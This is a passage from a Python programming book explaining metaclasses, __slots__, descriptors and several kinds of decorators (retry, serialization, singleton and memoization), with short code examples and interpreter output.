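class Example(metaclass=TracingMeta):
    pass

# __prepare__, __new__ and __init__ already ran at class definition time;
# only __call__ runs when an instance is created.
instance = Example()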

You should turn to metaclasses when you feel that using the basic Python code is making your APIs complex to use, and

increasing the length of the code more than it is needed. In that case, write boilerplate code to achieve the simplicity.

Validating subclasses with the __new__ method

The __new__ magic method is used when initializing a class to an instance. You can play around and tweak the process of creating the instance by using this method. In order of execution, __new__ is called before the __init__ method is invoked in the initialization process.

The class can also make use of the super() method to invoke the default __new__ method of the parent class.

class Car:
    def __new__(cls, *args, **kwargs):
        print("Instance creation in progress…")
        # object.__new__ takes no extra arguments; __init__ receives them instead
        my_inst = super(Car, cls).__new__(cls)
        return my_inst

    def __init__(self, make, model):
        self.car_make = make
        self.car_model = model

    def car_details(self):
        return f"{self.car_make} {self.car_model}"

>>> vehicle = Car("Honda", "City")
Instance creation in progress…

>>> vehicle.car_details()
Honda City

The preceding example shows what you can do with the magic methods, and the order in which it is executed with reference to other methods.

What more can you do with __slots__ ?

Let us discuss a way to give a boost to the speed of your Python code. You will be thankful for this when you solve some of those online competitive or hiring tests, which judge you on the time taken to run those test cases. For this, we will see how we can use the __slots__ attribute. Some of the reasons why it is encouraged to use slots are as follows:

Since data structures are optimized with Slots, attributes are stored and retrieved faster.

Reduction in memory usage when instantiating classes.

As touched upon in a previous chapter, when defining a class in Python, __slots__ can be used to specify which attributes the instances of the class should possess. This specification helps to save some space usage and enables quicker access to the attributes. Let us take the following example to compare both these cases:

class UsingSlots:
    __slots__ = "alpha"

class NotUsingSlots:
    pass

using_slots = UsingSlots()
not_using_slots = NotUsingSlots()

using_slots.alpha = "Alpha"
not_using_slots.alpha = "Alpha"

In [2]: %timeit using_slots.alpha
Out[2]: 39.4 ns

In [3]: %timeit not_using_slots.alpha
Out[3]: 51.05 ns

We notice that using slots is performant in execution time as they give the interpreter an idea of how to optimally handle the data structure behind the scenes. Python 3 slots usage have been known to show about a 30% speedup.

Slots also help to save memory or space used to store the instances by a significant amount. If you analyse the space usage from the preceding example, you will see results similar to the following, depending upon your system architecture:

In [4]: import sys

In [5]: sys.getsizeof(using_slots) Out[5]: 28

In [6]: sys.getsizeof(not_using_slots)
Out[6]: 35

So, we see that objects save up considerably on space usage when slots are used. However, the follow-up question you might have is how to decide when we want to use __slots__.

Instantiating a class leads to the allocation of additional space to include the __dict__ and __weakref__ data. The __dict__ is composed of all attributes which describe the instance and is writable in nature. When we do not wish to allocate additional space for __dict__, defining the custom __slots__ feature limits what Python should initially allocate. When you use __slots__, the child class will not create the __dict__, thereby saving space and boosting performance. This is illustrated as follows:

class ParentClass:
    __slots__ = ()

class DerivedClass(ParentClass):
    __slots__ = ('alpha',)

obj = DerivedClass()
obj.alpha = 'alpha'

Hence, it is recommended to use __slots__ in cases where the time and space optimization is absolutely necessary or worthwhile.

However, slots should not be used in other cases since they limit the way in which classes can be used, in particular, dynamic variable assignment. The following code snippet illustrates this:

class Car(object):
    __slots__ = ("car_make",)

>>> car = Car()
>>> car.car_make = "Honda"
>>> car.car_model = "City"
AttributeError: 'Car' object has no attribute 'car_model'

Python allows some ways to work around these issues, the most common one being to discourage the use of __slots__ altogether. However, a small compromise can help with achieving the dynamic assignments, which is illustrated as follows:

class Car:
    __slots__ = ("car_make", "__dict__")

>>> car = Car()
>>> car.car_make = "Honda"
>>> car.car_model = "City"

In this method, we give up the memory utilization benefits, but by including the __dict__ as part of the __slots__ property, we get to keep the dynamic assignment of variables.

Some of the other use cases where __slots__ usage is discouraged are as follows:

While creating a subclass of a built-in type (e.g., str, tuple, list, and so on) and planning to amend or add attributes to it.

Setting the instance variables' default values for the attributes of the class.

Bottom line – choose to use __slots__ when you really need that reduction in space/memory usage and performance in execution time.

Metaclasses for changing class behaviour

As we discussed earlier, the __call__ magic method helps in controlling how an object of a class is created. Take a case where we do not want the end user to directly create objects of the class we are creating. How can we achieve that? That is one of the cases where the __call__ method comes into the picture.

class NonInstanceClass(type):
    def __call__(self, *args, **kwargs):
        raise TypeError("This class cannot be instantiated!!")

class Car(metaclass=NonInstanceClass):
    @staticmethod
    def write_car_make(car_make):
        print(f"Make of Car: {car_make}")

>>> car = Car()
TypeError: This class cannot be instantiated!!

>>> Car.write_car_make("Honda City")
Make of Car: Honda City

The overridden __call__ method in the example ensures that the user cannot create an object of the class, since we have wired it to throw an exception when tried.

Another use case could be when we are writing an API when a custom design pattern needs to be implemented and the end user should be able to easily use the API. Look at the following simple example:

class MathOperations:
    """A class wrapper for mathematical operations for two integers."""
    def __init__(self, optr):
        self.optr = optr

    def __call__(self, num_one, num_two):
        if isinstance(num_one, int) and isinstance(num_two, int):
            return self.optr(num_one, num_two)
        raise ValueError("Enter the 2 integers")

def addition(num_one, num_two):
    return num_one + num_two

def product(num_one, num_two):
    return num_one * num_two

>>> toSum = MathOperations(addition)
>>> print(toSum(22, 35))
57

>>> toProduct = MathOperations(product)
>>> print(toProduct(15, 10))
150

The preceding example illustrates the dynamic selection of methods or snippets without any logic duplication. The __call__ method in the example helps to make the API simpler.

Let us consider another scenario where we want to create a cached instance. During the creation of an instance, when the same values are passed, you want the object to be returned from the previous cached initialization. Therefore, no instance should be created for the duplicate values of the parameters. The following example illustrates that:

class MyCachedClass(type):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.__cacheData = {}

    def __call__(self, _id, *args, **kwargs):
        if _id not in self.__cacheData:
            self.__cacheData[_id] = super().__call__(_id, *args, **kwargs)
        else:
            print("Class Instance already exists!!")
        return self.__cacheData[_id]

class ClientClass(metaclass=MyCachedClass):
    def __init__(self, _id, *args, **kwargs):
        self.id = _id

def trial():
    alpha = ClientClass(_id="alpha")
    beta = ClientClass(_id="alpha")
    print(id(alpha) == id(beta))

The preceding utility method will result in True, since the instantiation of beta will return the same instance retrieved from the cache.

I hope that the preceding examples of __call__ illustrate some of the use cases where metaclasses make life easier. There are several other use cases for the __call__ method, including Singleton implementations, memoization, and decorators.

You can dig more into the features of metaclasses for a lot of other complicated tasks that can be optimized. For more information, check the official Python documentation at

Descriptors in Python

Descriptors in Python refer to objects that implement the descriptor protocol and give the programmer the power to create other objects that can have specific functions, which are accessed similar to attributes of the object. The descriptor protocol includes the following four methods:

__get__(self, obj, type=None) -> object
__set__(self, obj, value) -> None
__delete__(self, obj) -> None
__set_name__(self, owner, name)

If your descriptor implements just .__get__(), then it’s said to be a non-data descriptor. If it implements .__set__() or .__delete__(), then it’s said to be a data descriptor. It is not just about the name, the behaviour of the descriptor types are also quite different. Data descriptors enjoy a higher precedence in the process of lookup.

Descriptors in Python work on the object’s dictionary in order to work on its attributes. When an attribute is being accessed, the look up chain is triggered, and the corresponding descriptors are invoked for finding the attributes.

Practically, when setting or getting attributes on an instance, some additional processing is required before the getters and setters are used on the attribute values. The descriptors help to add custom operations and validations directly, sans any additional function being called. Let us witness this with the following example:

import random

class GameOfDice:
    def __init__(self, sides_of_dice=6):
        self.sides_of_dice = sides_of_dice

    def __get__(self, instance, owner):
        return int(random.random() * self.sides_of_dice) + 1

    def __set__(self, instance, val_number):
        if not isinstance(val_number, int):
            raise ValueError("Please enter a number")
        print("Latest Drawn Value: {}".format(val_number))
        self.sides_of_dice = val_number

class PlayTheGame:
    roll_1 = GameOfDice()
    roll_2 = GameOfDice(9)
    roll_3 = GameOfDice(21)

>>> myGame = PlayTheGame()
>>> myGame.roll_1
2

>>> myGame.roll_2
4

>>> myGame.roll_3 = 9
Latest Drawn Value: 9

>>> myGame.roll_1 = "9"
ValueError: Please enter a number

In the preceding example, the __get__ descriptor is used to add to the functionality of the class, without any additional function being called. We are also taking advantage of the __set__ method to ensure that the type of the data passed is int only. The following summarizes the descriptor operations:

__get__(self, instance, owner): The default method to be called when an attribute is accessed.

__set__(self, instance, value): The default method to be called when the value of an attribute is set using the = operation.

__delete__(self, instance): The default method that is called when you want a particular attribute to be deleted.

Several use cases warrant the use of descriptors for enhanced control over the code. Situations like attribute validation or read-only attribute setup need a good understanding of descriptors, and they help to write cleaner code without setting up specific functions for each use case.
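As a small, illustrative sketch of the read-only case (the class and attribute names here are hypothetical), a data descriptor can simply refuse assignment in __set__:

class ReadOnly:
    """Data descriptor that exposes a fixed value and rejects assignment."""
    def __init__(self, value):
        self._value = value

    def __get__(self, instance, owner):
        return self._value

    def __set__(self, instance, value):
        raise AttributeError("This attribute is read-only")

class Configuration:
    api_version = ReadOnly("v1")

config = Configuration()
print(config.api_version)   # v1
config.api_version = "v2"   # raises AttributeError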

Conclusion

In this chapter, we learnt some of the most important Python fundamentals and their nuances. Modules are a collection of correlated Python code, which can define functions, variables, or even classes. They can contain executable code as well.

Metaclasses and metaprogramming provide a lot of power and flexibility to the developer to write clean, performant, and easy to use code. One downside is that metaprogramming can introduce a good amount of complication into the code itself. In many cases, an elegant solution can be achieved using the decorator protocol. Metaclasses should be used when the need of the hour is more generic code that is simple to use, rather than simple code.

In the next chapter, we will be taking a dive into decorators and context managers in more detail.

Key takeaways

You can use the __init__.py file to control what modules from any level of the package are visible to the external world.

The special value of the string __main__ for the __name__ variable indicates that the Python interpreter will be executing your script and not importing it. You can create obfuscated zipped packages of your project code, bundled with a __main__.py, which can be run as a standalone executable, since Python can run code from zip archives as well.

The naïve approach to resolving circular imports would be to simply drop the type hints. The smarter approach would be to use Conditional Imports, which check whether TYPE_CHECKING is enabled.

In Python, modules being singleton mean that only one copy of it is loaded into memory at the first import. Any subsequent import simply returns the same loaded object.

We can implement Singleton classes in Python in multiple ways, including decorators, metaclasses, and base parent classes, among others.

If you want to create a script only for standalone execution, but want to restrict explicit imports into that module, punctuations in the name can be a good hack!

The ‘import’ statement is compliant with the Python naming rules, while the __import__ statement is not. Both are still usable.

A script without the .py extension is also a valid script to be executed from the terminal. However, you cannot import such a script as Python mandates using a .py for identification as modules. Use __all__ to decide which components of a script are exposed for import by default when an import * is executed. However, this does not hide components from the explicit imports.

You should turn to metaclasses when you feel that using basic Python code is making your APIs complex to use, and increasing the length of the code more than it is needed. In that case, write boilerplate code to achieve the simplicity. Using __slots__ is performant in execution time, as it gives the interpreter an idea of how to optimally handle the data structure behind the scenes. Python 3 slots usage has been known to show about a 30% speedup. Choose to use __slots__ when you really need that reduction in space/memory usage and performance in execution time.

When setting or getting the attributes on an instance, some additional processing is required before the getters and setters are used on the attribute values. The descriptors help to add the custom operations and validations directly, sans any additional function being called.

Further reading

Daniele Bonetta, GraalVM: Metaprogramming inside a polyglot Toni Mattis, Patrick Rein, Robert Hirschfeld, Ambiguous, informal and unsound: metaprogramming for

Kerry A. Seitz, Tim Foley, et. al. Staged metaprogramming for shader system Rodin T. A. Aarssen, Tijs van der Storm, High-fidelity metaprogramming with separator syntax

CHAPTER 5 Pythonic Decorators and Context Managers

“Great things are done by a series of small things brought together.”

— Vincent Van Gogh

Decorators are constructs which were introduced in Python with PEP318, to provide the ability to add extra functionality to existing code in a dynamic manner. As we have seen, this feature of updating a fragment of a program by another is sometimes referred to as metaprogramming. Decorators in Python are nothing like the Decorator Pattern in software design. They are functions that take another function as an input and extends or modifies the behaviour of the function explicitly. Similarly, context managers help in writing safer, resilient, and fault-tolerant code in Python. Both Decorators and Context Managers are powerful functionalities, and they can really help enhance your Python code base.

Structure

Decorators and Context Managers make the code and the developer’s life better, but there is a humongous amount of discussion to be had around them. Within the scope of this book, broadly, the following areas will be covered in this chapter:

Understand decorators, their usage, and several implementation details.

Patterns for writing performant, optimal, and effective decorators.

The DRY Principle and Separation of concerns in Decorators.

Learning about Context Managers and their several practical use cases.

Objectives

By the end of this chapter, you will have insights into how to effectively integrate and implement Decorators and Context Managers in your code, along with the following:

Learning how to create custom decorators for dynamically extending the existing functions in your code without structurally modifying them.

Creating localized scope in the code, binding the entry and exit of a section using Context Managers for performing some operations. You will be able to think through how to create safer Python code in production.

Reducing human errors largely by avoiding forgotten close statements or termination logic.

Learning about some of the lesser-known use cases of when you should be choosing to use Decorators and Context Managers.

Understanding Python Decorators

A few common use cases of Decorators that most of us are using or have already used in our day-to-day work include the following:

Transforming function parameters

Validating supplied parameters

Customizing logging and profiling of code

Enabling code reuse by moving logic to a common place

Enabling retry or other handling on error

Limiting input and output rate of the objects

Caching or memoization of values for faster access

Decorators provide less invasive solutions for most of the preceding problems and reduce the risk of introducing bugs in the code. They can be configured to run before and/or after the objects that have been wrapped within it. Code injection into the function, class, or object can be achieved with decorators. This behaviour can prove to be useful in a ton of scenarios.
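A minimal, illustrative sketch of this before/after behaviour (the function names here are hypothetical):

from functools import wraps

def log_call(func):
    @wraps(func)
    def wrapper(*args, **kwargs):
        print(f"Entering {func.__name__}")   # code injected before the call
        result = func(*args, **kwargs)
        print(f"Leaving {func.__name__}")    # code injected after the call
        return result
    return wrapper

@log_call
def process_order(order_id):
    return f"processed {order_id}"

print(process_order(42))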

Decorators are powerful constructs and most of the well-known API libraries including the likes of Flask, make use of Decorators to create robust APIs. In this section, we will look at some of the key features of decorators.

Decoration of functions

The simplest unit of object in Python that decorators can be applied to is the function. There are a plethora of use cases for which we prefer to use decorators – be it parameter validations, execution conditions, modification of the behaviour of a function, modification of the number and types of arguments it accepts, caching or memoization of outputs, and many others. As an example, let us write a custom exception decorator that reruns the function a limited number of times when a certain exception has been encountered:

import time
from functools import wraps

def rerun(ExceptionTuple, tries=4, delay=3, backoff=2):
    def retry(func):
        @wraps(func)
        def run_again(*args, **kwargs):
            maxtries, maxdelay = tries, delay
            while maxtries > 1:
                try:
                    return func(*args, **kwargs)
                except ExceptionTuple as e:
                    print(f"Failed {str(e)}! Retrying in {maxdelay} seconds…")
                    time.sleep(maxdelay)
                    maxtries -= 1
                    maxdelay *= backoff
            return func(*args, **kwargs)
        return run_again
    return retry

We will discuss the significance and use of @wraps later in this chapter. The underscore is also a valid name for an unused variable. This decorator is parameterized and can be applied to any method. Take the following example:

@rerun(Exception, tries=4)
def schedule_task(command):
    """schedules a task, throws an Exception when resources are busy"""
    return task.run()

As we have learnt in the previous section, the @rerun is just a visually appealing and aesthetically nice way of interpreting:

schedule_task = rerun(Exception, tries=4)(schedule_task)

In this small example, we saw how decorators could be leveraged to create a mechanism to rerun a function a certain number of times when it throws an exception. This can be especially helpful when getting resources from an endpoint URL over the network, or for resource connection establishment, like connections to databases, where connections sometimes time out. The decorated functions can be of help in such cases.

Decoration of classes

The syntactic considerations of decorating classes are the same as what we saw for functions. The only difference is that, just as the inner wrapper in a function decorator takes a reference to a function as an argument, the class implementation should accept a class as an argument and handle the logic accordingly.

There are both pros and cons of decorating classes. If judiciously used, the classes could be decorated with additional/external methods and attributes, which operate behind the scenes. However, overdoing class decoration can make the code illegible and convoluted. We will discuss more benefits and concerns in the Separation of Concerns section of this chapter.

Some of the less-discussed advantages of class decorators are outlined below:

All the merits of reusing code, including reduced complexity and fewer lines of code, as well as the DRY (Don't Repeat Yourself) principle. A good example could be to have a decorator that ensures that different classes adhere to some common interface or checks.

With a decorator based design, the initial size of classes will be smaller, and they can be upgraded later with the help of decorators.

The maintainability of code is improved with decorators, since the changes to common or similar logic now happen in one place, and there is less risk of missing some corner code path when making a change.

It is simpler compared to metaclasses.

Among the several uses of decorators, let us take an example, which will illustrate the points we had discussed about the usefulness of decorators around classes.

Let us design a class for a system that handles different classifications of data, which are then sent across to an external system. Each type of data might have different aspects to be handled before sending it across. For example, login information might be sensitive and need to be hidden, hashed, or obfuscated. The time-based fields might need conversions or changes in their display format. The initial step would be to write this event data handling class and chart out the different parts:

class SerializeMessages:
    def __init__(self, message):
        self.message = message

    def serialize(self) -> dict:
        return {
            "login_name": self.message.login_name,
            "access_key": "**redacted**",
            "connection": self.message.connection,
            "timestamp": self.message.timestamp.strftime("%Y-%m-%d %H:%M"),
        }

class LoginMessage:
    MESSAGE_SERIALIZER = SerializeMessages

    def __init__(self, login_name, access_key, connection, timestamp):
        self.login_name = login_name
        self.access_key = access_key
        self.connection = connection
        self.timestamp = timestamp

    def serialize(self) -> dict:
        return self.MESSAGE_SERIALIZER(self).serialize()

This class would work well to parse the basic login messages and serialize them after operating on the fields for protection and formatting. However, when you try to scale this in the near future, you will run into some of the following unintended concerns:

Increasing number of classes: When the data size and types increase, there will be more classes to handle the different types of data.

Rigid approach: Let us say we want to avoid the duplication and reuse some parts of the code in the classes – the approach would be to move that code to a function and call it from all the places. The limitation remains that you have to invoke it many times from different classes, which dilutes the benefit of reuse.

Boilerplate code: The invoked common function would have to be available in all the classes for every data type. Even extracting it out to a unique class of its own would not be a very good use of inheritance.

A different and ideal approach here would be to create a single object that takes in the update functions as arguments, along with an instance of the message, and serializes the object after applying the update logic. The common serializer can now simply be used on all the different message type based classes. This object can then be used to decorate the class with the serialization logic:

from datetime import datetime

# Define the serializer class
class SerializeMessages:
    def __init__(self, message_flds: dict) -> None:
        self.message_flds = message_flds

    def serialize(self, message) -> dict:
        return {
            field: transformation(getattr(message, field))
            for field, transformation in self.message_flds.items()
        }

# MsgSerialization class
class MsgSerialization:
    def __init__(self, **trnsfrm):
        self.serialzr = SerializeMessages(trnsfrm)

    def __call__(self, message_class):
        def function_serializer(message_instance):
            return self.serialzr.serialize(message_instance)
        message_class.serialize = function_serializer
        return message_class

# Define the utility methods
def obfuscate_passkey(passkey) -> str:
    return "**redacted**"

def repr_timestamp(timestamp: datetime) -> str:
    return timestamp.strftime("%Y-%m-%d %H:%M")

def nochange(field_name):
    return field_name

# Applying the decorator to the class
@MsgSerialization(
    login_name=nochange,
    passkey=obfuscate_passkey,
    connection=nochange,
    timestamp=repr_timestamp,
)
class LoginMessage:
    def __init__(self, login_name, passkey, connection, timestamp):
        self.login_name = login_name
        self.passkey = passkey
        self.connection = connection
        self.timestamp = timestamp

If you observe, the decorator provides a clean representation of what operations we will be applying to every field. You do not have to rustle through the code to figure out what happens to the fields. Essentially, the decorator here is updating the class it wraps and adding an additional method to the class called serialize, thereby extending the functionality of the class without having to explicitly change it. In fact, using dataclasses, you could make the implementation even simpler:

from dataclasses import dataclass
import datetime

@MsgSerialization(
    login_name=nochange,
    passkey=obfuscate_passkey,
    connection=nochange,
    timestamp=repr_timestamp,
)
@dataclass
class LoginMessage:
    login_name: str
    passkey: str
    connection: str
    timestamp: datetime.datetime

Note that dataclasses are only available natively in Python 3.7 and beyond.
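As an illustration of what the decorated class now offers (the field values below are made up), calling the injected serialize method on an instance of the dataclass version would yield the redacted and formatted dictionary:

import datetime

msg = LoginMessage("jdoe", "secret", "vpn-01",
                   datetime.datetime(2021, 7, 1, 10, 30))
msg.serialize()
# {'login_name': 'jdoe', 'passkey': '**redacted**',
#  'connection': 'vpn-01', 'timestamp': '2021-07-01 10:30'}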

Decoration of other constructs

Having learnt how to use decorators, we should keep in mind that it is not just functions or classes that can be decorated. As shown in the examples, you can also apply them to generators, coroutines, or even already decorated objects. Decorators can also be stacked, which we will look into in more detail later in the chapter.

Let us take the example of a generator and define a decorator to extend its functionality. In a function, you could simply get the result of the inner function and perform your operations in the decorator routine. However, how would you do that with generators when the future values are not even known? That is where the “yield from” construct comes into play:

import time
import functools

def log_method_calls(function):
    @functools.wraps(function)
    def logging_wrapper(*args, **kwargs):
        t_begin = time.time()
        value = yield from function(*args, **kwargs)
        t_end = time.time()
        duration = t_end - t_begin
        print('Function %s took %f' % (function.__name__, duration))
        return value
    return logging_wrapper

The result of the preceding decorator applied to the following function would be:

@log_method_calls
def demo():
    for index in range(10):
        time.sleep(index)
        yield index

In [4]: tuple(demo())
Function demo took 41.92839
Out[4]: (0, 1, 2, 3, 4, 5, 6, 7, 8, 9)

Decorators are applicable to any object in Python.

Accepting arguments in decorators

Until now, we have seen that decorators can be powerful tools. However, their utility could be manifold, if we were able to customize the functionality of decorators using parameters. Python allows different methods of implementing decorators that take in parameters. In this section, we will be looking at some of those.

The first technique is to create decorators that are a level deeper and have nested functions, introducing a new level of indirection. Another technique is to use a class for creating the decorator. Personally, I favour the second method, as it is clearer to understand and easier to visualize in terms of object-oriented programming, compared to thinking in terms of multi-level nested functions. We will be exploring both approaches, and you can decide which one suits your needs most.

Let us take a decorator whose objective is to run a function multiple times. The parameter that we would need is the count of how many times we want to run the re-run function.

@rerun(count=5)
def say_hello(text):
    print(f"Hello {text}")

>>> say_hello("FooBar")
Hello FooBar
Hello FooBar
Hello FooBar
Hello FooBar
Hello FooBar

We have seen that a direct decorator call will simply replace the original function with the wrapped one. Therefore, when we parameterize the rerun decorator, we still have to maintain this property – it should return a function, which has wrapped the original one after processing the argument. Something like the following should work:

def rerun(count):
    def rerun_wrapper(function):
        # Add logic for the wrapper here
        …
    return rerun_wrapper

In this case, there would be an extra function layer around the inner function. It is not as inception-like as it sounds. Let us dive a bit deeper:

import functools

def rerun(count):
    def rerun_decorator(function):
        @functools.wraps(function)
        def rerun_wrapper(*args, **kwargs):
            for _ in range(count):
                reference = function(*args, **kwargs)
            return reference
        return rerun_wrapper
    return rerun_decorator

It is a similar implementation to the decorators we discussed in the previous sections, the only difference being an additional function to deal with the inputs to the decorator. The innermost function looks like the following:

def rerun_wrapper(*args, **kwargs):
    for _ in range(count):
        reference = function(*args, **kwargs)
    return reference

This takes in any number of arguments and gives back the function value. It contains the logic of executing the original function multiple times using a loop. The next outer function is as follows:

def rerun_decorator(function):
    @functools.wraps(function)
    def rerun_wrapper(*args, **kwargs):
        …
    return rerun_wrapper

Look at the naming conventions – it is a personal preference to name the function hierarchy this way, and it has worked well over the years. We use a base name for the decorator as the outermost function. Within that is the decorator function, whose name starts with the base name, and the innermost function is the wrapper function, whose name also contains the base name. This clearly demarcates the three levels.

Decorators without parameters can be used without parentheses. Use the parentheses when you pass in parameters; otherwise, leave them out.

Evaluation of multiple decorators

Multiple decorators can be applied to a function or a class – the question that might arise in a developer’s mind is in which order are the decorators evaluated? What is the best way to sequence decorators?

Let us take an example where you want to add a salutation text before the name of a person. We will create a decorator to do that:

def salutation(function):
    def add_salutation_wrap():
        salutation = function()
        return " ".join([salutation, "Stephen Hawking!"])
    return add_salutation_wrap

def change_case(function):
    def to_upper():
        case_txt = function()
        if not isinstance(case_txt, str):
            raise TypeError("Not a string type")
        return case_txt.upper()
    return to_upper

@change_case
@salutation
def get_salutation():
    return "Hello"

>>> get_salutation()
HELLO STEPHEN HAWKING!

So you see, the order of execution of the decorators is from inner to outer, that is, from bottom to top. Otherwise, in this example, the appended name would not have been in uppercase. We can also prove this by reversing the decorator order and seeing what happens:

@salutation
@change_case
def get_salutation():
    return "Bye"

>>> get_salutation()
BYE Stephen Hawking!

The name is not converted to uppercase since it was inserted after the change_case decorator was executed.
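Remember that stacking decorators is just shorthand for nested calls; the two orderings above are equivalent to the following assignments, which makes the bottom-to-top evaluation order explicit:

# @change_case stacked on top of @salutation
get_salutation = change_case(salutation(get_salutation))

# @salutation stacked on top of @change_case
get_salutation = salutation(change_case(get_salutation))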

Using functools library for decorators

When a decorator is created, what it essentially does under the hood is substitute a function with another modified function that usually adds to the behaviour:

from datetime import datetime

def enable_logs(function):
    def enable_logs_wrapper(*args, **kwargs):
        print(function.__name__ + " was invoked at " + str(datetime.now()))
        return function(*args, **kwargs)
    return enable_logs_wrapper

@enable_logs
def get_square(number):
    return number * number

>>> square = get_square(9)
>>> print(get_square.__name__)
enable_logs_wrapper

Voila! You see that the decorator we put in place has modified the name of the function in the reference. Therefore, under the hood, Python is executing the wrapper function enable_logs_wrapper whenever get_square is called.

Using decorators causes you to lose the meta-information about the entity, like __doc__ and __name__, among others. Use functools.wraps() to persist the data post decoration.

The wraps API in the functools library can deal with this issue. This method ensures that when wrapping the method, all the meta-information is copied over from the original entity to the wrapped entity before any modification takes place. An updated version of the preceding code is as follows:

from datetime import datetime
from functools import wraps

def enable_logs(function):
    @wraps(function)  # ← use the functools API to wrap
    def enable_logs_wrapper(*args, **kwargs):
        print(function.__name__ + " was invoked at " + str(datetime.now()))
        return function(*args, **kwargs)
    return enable_logs_wrapper

@enable_logs
def eval_expression(number):
    '''a computing function'''
    return number + number * number

# prints 'eval_expression'
print(eval_expression.__name__)
# prints 'a computing function'
print(eval_expression.__doc__)

So, from the preceding example, it is evident that the wraps() method in the functools standard library helps in persisting the meta-information of the entity, which otherwise would have been lost with custom decorators. There is also a simple third-party library called decorator that houses useful functionality for a more robust definition and use of decorators.

from decorator import decorator

@decorator
def call_log(function, *args, **kwargs):
    kwords = ', '.join('%r: %r' % (key, kwargs[key]) for key in sorted(kwargs))
    print("Function %s called! Arguments %s, {%s}"
          % (function.__name__, args, kwords))
    return function(*args, **kwargs)

@call_log
def random_function():
    pass

>>> random_function()
Function random_function called! Arguments (), {}

You see how the decorator library simplifies the creation of decorators. A similar implementation is needed for creating decorators for methods defined on classes. Let us see that in action with the following small example:

import time
import requests
from functools import wraps

class FailedRequest(Exception):
    pass

def try_again(times=3, pause=10):
    def retry(function):
        @wraps(function)
        def run_again(*args, **kwargs):
            for try_num in range(times):
                response = function(*args, **kwargs)
                if response is not None:
                    return response
                time.sleep(pause)
            return response
        return run_again
    return retry

class DownloadFromRemote:
    def __init__(self, remote_url, hdr_string):
        self.remote_url = remote_url
        self.hdr = hdr_string

    @try_again(times=4, pause=5)
    def request_file(self):
        try:
            rsp = requests.get(self.remote_url, headers=self.hdr)
            if rsp.status_code in (429, 500, 502, 503):
                return None  # transient failure: signal the decorator to retry
        except Exception as err:
            raise FailedRequest("Server connection failed!") from err
        return rsp

The preceding example is a custom implementation of the decorator for the class method. You can also create the same decorator using the decorator library. Try it yourself.

Stateful decorators

Decorators are useful tools if you want to maintain or track a state across different function calls. Let us see how we can keep track of the number of times a function was invoked using a decorator:

import functools

def invoke_count(function):
    @functools.wraps(function)
    def calls_wrapper(*args, **kwargs):
        calls_wrapper.count_of_calls += 1
        print(f"Call No. {calls_wrapper.count_of_calls}")
        return function(*args, **kwargs)
    calls_wrapper.count_of_calls = 0
    return calls_wrapper

@invoke_count
def hello_world():
    print("Hello to you, too!")

In this case, the count of the calls is the state of the function that needed to be maintained, and is stored in the attribute of the decorator. The following is what it results in:

>>> hello_world()
Call No. 1
Hello to you, too!

>>> hello_world()
Call No. 2
Hello to you, too!

>>> hello_world.count_of_calls
2

Similar implementations could be made for other sophisticated state management in classes and functions.
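One such alternative, sketched here for illustration (the class name CountInvocations is made up), is to hold the state on a class-based decorator instead, with the instance itself acting as the wrapper through __call__:

import functools

class CountInvocations:
    def __init__(self, function):
        functools.update_wrapper(self, function)
        self.function = function
        self.count_of_calls = 0   # state lives on the decorator instance

    def __call__(self, *args, **kwargs):
        self.count_of_calls += 1
        print(f"Call No. {self.count_of_calls}")
        return self.function(*args, **kwargs)

@CountInvocations
def hello_world():
    print("Hello to you, too!")

The behaviour mirrors the invoke_count example above, with the count stored as an attribute of the decorator instance rather than of the wrapper function.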

Creating singletons with decorators

Singleton classes have one persistent instance, and no more can be created at a time. Python itself makes use of singletons in the likes of True, False, and None, which are used extensively in your code without you even thinking of them as singletons.

if _method is None:
    return some_decorator
else:
    return some_decorator(_method)

In the preceding snippet, the is-based comparison results in True when both references point to the very same instance (here, the None singleton). Let us now define a decorator that ensures that any class wrapped in it will be instantiated only once; every other time it is instantiated, the first instance that was persisted is returned.

import functools

def make_singleton(cls):
    @functools.wraps(cls)
    def sgl_wrapper(*args, **kwargs):
        if not sgl_wrapper.object:
            sgl_wrapper.object = cls(*args, **kwargs)
        return sgl_wrapper.object

    sgl_wrapper.object = None
    return sgl_wrapper

@make_singleton
class DeltaStrategies:
    # Some Logic
    pass

Decorators for classes and functions are created in the same way. Conventionally, to differentiate between them, we use the cls or func/function variable name as the wrapper input. Let us execute the preceding class with the decorator:

>>> strat_one = DeltaStrategies()
>>> strat_two = DeltaStrategies()

>>> id(strat_one)
123872387888837

>>> id(strat_two)
123872387888837

>>> strat_one is strat_two
True

The is keyword confirms that both the objects refer to the same instance, and that the second call did not create a new one.

Singleton classes are not really used as often in Python as in other languages. The effect of a Singleton is usually better implemented as a global variable in a module.
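For completeness, the module-level alternative mentioned in the note could look like the following sketch (the module name strategies.py and the instance name are made up):

# strategies.py
class DeltaStrategies:
    ...

# A single shared instance, created when the module is first imported.
# Python caches imported modules, so every importer sees the same object.
delta_strategies = DeltaStrategies()

# client code:
# from strategies import delta_strategies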

Caching function return values – memoisation

When we are writing APIs that query and fetch data from some location, sometimes overlapping requests can unnecessarily increase the runtime of the functions. An accepted way of handling such queries optimally is to cache the results in a smart manner. This is referred to as memoization. Let us see a simple example of getting the nth Fibonacci series entry to see how this can be used. Assume that we have written a count_calls decorator, a modified version of the rerun decorator from the previous sections, which adds a num_calls property to the decorated entity:

@count_calls
def get_fibo_series(start_int):
    if start_int < 2:
        return start_int
    return get_fibo_series(start_int - 1) + get_fibo_series(start_int - 2)

If we look at how this performs on execution, the following is how it goes:

>>> get_fibo_series(10)
55

>>> get_fibo_series.num_calls
177

The code works, but it is terrible in performance. While computing the 10th Fibonacci number in the series, you need to know only the previous 9 numbers. However, this code keeps recalculating the previous numbers for the number computed. That results in 177 calls for the 10th number. If you keep going, you will notice that it increases exponentially – about 22000 computations for the 20th value and about 2.7 million for the 30th number. This is grossly sub-optimal in performance, and warrants a case of storing the intermediate information, rather than re-generating. The following is an approach for using a lookup table as a cache:

import functools
from decorators import count_calls

def enable_caching(function):
    @functools.wraps(function)
    def wrapper(*args, **kwargs):
        key_for_cache = args + tuple(kwargs.items())
        if key_for_cache not in wrapper.cache:
            wrapper.cache[key_for_cache] = function(*args, **kwargs)
        return wrapper.cache[key_for_cache]
    wrapper.cache = dict()
    return wrapper

@enable_caching
@count_calls
def get_fibo_series(start_int):
    if start_int < 2:
        return start_int
    return get_fibo_series(start_int - 1) + get_fibo_series(start_int - 2)

The enable_caching decorator now has a member called cache that stores the result of every function call. This acts as a lookup table and will return a pre-computed value if the function has already been called for that set of arguments.

